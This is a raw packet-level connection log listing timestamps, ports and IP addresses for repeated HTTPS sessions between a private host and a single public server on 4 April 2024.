Apr 4, 2024 17:49:37.817385912 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.817446947 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.817478895 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.817488909 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.817501068 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.817547083 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.817547083 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.822777033 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.822808981 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.822859049 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.822868109 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.822910070 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.822910070 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.827946901 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.827977896 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.828021049 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.828030109 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.828084946 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.828084946 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.833630085 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.833683968 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.833719969 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.833729982 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.833775997 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.839416027 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.839457989 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.839551926 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.839551926 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.839565039 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.840414047 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.844826937 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.844854116 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.844911098 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.844918013 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.844933987 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.844969988 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.847740889 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.847779036 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.847825050 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.847832918 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.847888947 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.847888947 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.850717068 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.850742102 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.850836992 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.850842953 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.850867033 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.850986958 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.858588934 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.858619928 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.858707905 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.858707905 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.858717918 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.859261990 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.863567114 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.863595963 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.863684893 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.863693953 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.863773108 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.863987923 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.866671085 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.866715908 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.866748095 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.866755009 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.866811037 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.866811037 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.872298956 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.872354031 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.872370005 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.872386932 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.872411013 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.872481108 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.875324011 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.875375986 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.875402927 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.875408888 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.875427008 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.875447035 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.875447035 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.875499010 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.875911951 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.875930071 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:38.049020052 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:38.049066067 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:38.049129009 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:38.049731970 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:38.049746990 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:38.575725079 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:38.575802088 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:38.576275110 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:38.576287031 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:38.576550961 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:38.576555967 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.407108068 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.407141924 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.407198906 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.407198906 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:39.407274008 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:39.407283068 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.407378912 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:39.526133060 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.526165009 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.526227951 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:39.526257038 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.526274920 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:39.526474953 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:39.704474926 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.704504967 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.704555988 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:39.704585075 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.704643965 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:39.704668045 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:39.813874960 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.813903093 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.813977957 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:39.814004898 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.814023018 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:39.814162016 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:39.907459021 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.907480955 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.907567978 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:39.907577991 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.907619953 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:39.977448940 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.977478027 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.977547884 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:39.977560043 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:39.977603912 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.030879974 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.030909061 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.030985117 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.030996084 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.031039000 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.079886913 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.079919100 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.079993963 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.080012083 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.080024004 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.080065966 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.130260944 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.130299091 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.130354881 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.130382061 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.130395889 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.130428076 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.171737909 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.171767950 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.171827078 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.171838999 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.171881914 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.213426113 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.213458061 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.213516951 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.213529110 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.213582039 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.213589907 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.248467922 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.248500109 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.248553038 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.248564005 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.248610020 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.277450085 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.277481079 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.277546883 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.277564049 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.277597904 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.277611971 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.302129030 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.302165985 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.302253008 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.302269936 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.302316904 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.329301119 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.329348087 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.329381943 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.329397917 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.329421997 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.329442024 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.343941927 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.343990088 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.344027042 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.344039917 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.344064951 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.344072104 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.344077110 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.344114065 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.344518900 CEST	49798	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.344536066 CEST	443	49798	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.390593052 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.390638113 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.390712976 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.390933990 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.390947104 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.921514988 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.921574116 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.922060013 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.922070026 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:40.922233105 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:40.922236919 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:41.760389090 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:41.760418892 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:41.760436058 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:41.760514021 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:41.760531902 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:41.760557890 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:41.760581970 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:41.880115032 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:41.880151033 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:41.880194902 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:41.880208969 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:41.880239964 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:41.880259037 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:42.060849905 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:42.060882092 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:42.060940027 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:42.060970068 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:42.060986996 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:42.061119080 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:42.170291901 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:42.170316935 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:42.170361996 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:42.170387030 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:42.170413971 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:42.170499086 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:42.265213013 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:42.265244007 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:42.265280962 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:42.265295982 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:42.265310049 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:42.265311956 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:42.265332937 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:42.265358925 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:42.265918016 CEST	49802	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:42.265930891 CEST	443	49802	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:43.177779913 CEST	49807	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:43.177822113 CEST	443	49807	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:43.177975893 CEST	49807	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:43.178400993 CEST	49807	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:43.178412914 CEST	443	49807	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:43.705163002 CEST	443	49807	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:43.705252886 CEST	49807	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:43.705776930 CEST	49807	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:43.705785990 CEST	443	49807	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:43.705955029 CEST	49807	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:43.705960989 CEST	443	49807	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:43.705981016 CEST	49807	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:43.705995083 CEST	443	49807	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:44.580986977 CEST	443	49807	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:44.581060886 CEST	443	49807	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:44.581132889 CEST	49807	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:44.581161022 CEST	49807	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:44.585896015 CEST	49807	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:44.585916042 CEST	443	49807	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:44.638470888 CEST	49811	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:44.638511896 CEST	443	49811	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:44.638580084 CEST	49811	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:44.638895035 CEST	49811	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:44.638907909 CEST	443	49811	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:45.178472996 CEST	443	49811	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:45.178540945 CEST	49811	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:45.179187059 CEST	49811	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:45.179192066 CEST	443	49811	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:45.179390907 CEST	49811	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:45.179397106 CEST	443	49811	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:46.124152899 CEST	443	49811	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:46.124243021 CEST	443	49811	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:46.124242067 CEST	49811	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:46.124358892 CEST	49811	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:46.124496937 CEST	49811	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:46.124519110 CEST	443	49811	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:46.126307964 CEST	49814	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:46.126362085 CEST	443	49814	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:46.126543045 CEST	49814	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:46.126770020 CEST	49814	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:46.126786947 CEST	443	49814	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:46.653333902 CEST	443	49814	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:46.653465986 CEST	49814	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:46.654253960 CEST	49814	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:46.654266119 CEST	443	49814	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:46.654556990 CEST	49814	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:46.654563904 CEST	443	49814	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:47.587085962 CEST	443	49814	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:47.587166071 CEST	443	49814	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:47.587241888 CEST	49814	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:47.648334980 CEST	49814	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:47.648370028 CEST	443	49814	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:47.666344881 CEST	49816	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:47.666394949 CEST	443	49816	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:47.666522026 CEST	49816	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:47.666982889 CEST	49816	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:47.666996956 CEST	443	49816	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:48.196681023 CEST	443	49816	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:48.196769953 CEST	49816	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:48.197221041 CEST	49816	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:48.197231054 CEST	443	49816	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:48.197552919 CEST	49816	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:48.197557926 CEST	443	49816	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:49.118896008 CEST	443	49816	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:49.118973017 CEST	49816	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:49.118999958 CEST	443	49816	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:49.119014978 CEST	443	49816	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:49.119077921 CEST	49816	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:49.120162010 CEST	49816	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:49.120176077 CEST	443	49816	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:49.752053022 CEST	49817	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:49.752125978 CEST	443	49817	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:49.752471924 CEST	49817	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:49.752700090 CEST	49817	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:49.752720118 CEST	443	49817	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:50.277899027 CEST	443	49817	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:50.277976036 CEST	49817	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:50.278456926 CEST	49817	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:50.278469086 CEST	443	49817	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:50.278625011 CEST	49817	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:50.278630972 CEST	443	49817	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:50.278685093 CEST	49817	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:50.278700113 CEST	443	49817	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:50.278712034 CEST	49817	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:50.278717041 CEST	443	49817	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:50.278810978 CEST	49817	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:50.278836012 CEST	443	49817	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:50.280503035 CEST	49817	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:50.280531883 CEST	443	49817	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:50.284559965 CEST	49817	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:50.284574032 CEST	443	49817	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:51.910124063 CEST	443	49817	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:51.910202026 CEST	443	49817	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:51.910204887 CEST	49817	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:51.910249949 CEST	49817	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:51.910382986 CEST	49817	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:51.910402060 CEST	443	49817	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:52.102751017 CEST	49818	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:52.102812052 CEST	443	49818	95.216.179.73	192.168.2.10
